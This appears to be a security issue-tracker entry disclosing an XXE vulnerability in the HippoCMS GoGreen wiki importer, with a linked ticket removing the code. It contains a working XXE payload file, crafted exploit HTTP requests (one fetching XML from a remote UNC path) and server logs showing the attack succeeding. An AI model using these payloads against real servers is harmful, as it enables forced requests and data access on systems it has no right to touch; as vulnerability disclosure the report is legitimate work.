Low Description
Positive Technologies experts have detected an XXE vulnerability in HippoCMS-GoGreen-7.9.4:
entry point
hippogogreen-3.09.06\site\src\main\java\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.java
line 90
String wikiContentFileSystem = request.getParameter("filesystemLocation");
exit point
hippogogreen-3.09.06\site\src\main\java\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.java
line 121
parser.parse(f, handler);
https://issues.onehippo.com/browse/GOGREEN-1222
HippoCMS-GoGreen-7.9.4\tomcat\webapps\site\WEB-INF\classes\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.class
exploit 1: load xml from local file and make HTTP request to local webserver
xxe.xml:
<?xml version="1.0"?><!DOCTYPE abc [
<!ELEMENT abc ANY>
<!ENTITY xxe SYSTEM "http://localhost/test.php?test=xxe_test">
]><abc>&xxe;</abc>
exploit:
GET /site/_hn:action%7Cr20_r1_r1%7C/importer?number=1&offset=&filesystemLocation=c%3A%5Cxxe.xml&type=news HTTP/1.1
Host: localhost:8080
Connection: close
In debug log:
array (
'HTTP_USER_AGENT' => 'Java/1.8.0_45',
'HTTP_HOST' => 'localhost:80',
'SERVER_NAME' => 'localhost',
'SERVER_ADDR' => '127.0.0.1',
'SERVER_PORT' => '80',
'REMOTE_ADDR' => '127.0.0.1',
'REQUEST_SCHEME' => 'http',
'REMOTE_PORT' => '35273',
'GATEWAY_INTERFACE' => 'CGI/1.1',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'REQUEST_METHOD' => 'GET',
'QUERY_STRING' => 'test=xxe_test',
'REQUEST_URI' => '/test.php?test=xxe_test',
'SCRIPT_NAME' => '/test.php',
'PHP_SELF' => '/test.php',
)
exploit 2: load xml from remote host using Windows UNC path
GET /site/_hn:action%7Cr20_r1_r1%7C/importer?number=1&offset=&filesystemLocation=\\server\xxe_poc\xxe.xml&type=news HTTP/1.1
Host: localhost:8080
Connection: close
Attachments
Issue Links
- is forward ported by
-
HGGE-291 Remove unused WikiImporter because of potential XXE vulnerability
-
- Closed
-